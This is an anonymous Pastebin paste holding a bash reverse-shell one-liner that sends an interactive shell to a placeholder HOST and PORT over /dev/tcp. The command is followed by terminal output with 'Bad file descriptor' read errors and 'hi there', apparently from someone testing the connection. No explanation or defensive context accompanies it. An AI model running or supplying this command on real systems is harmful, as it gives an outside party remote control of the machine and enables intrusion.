Guest User

Untitled

a guest
Jun 20th, 2018
91
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.14 KB | None | 0 0
  1. bash -i > /dev/tcp/HOST/PORT 0<&1 2>&1
  2.  
  3. read: read error: 0: Bad file descriptor
  4.  
  5. hi there
  6. read: read error: 0: Bad file descriptor
Add Comment
Please, Sign In to add comment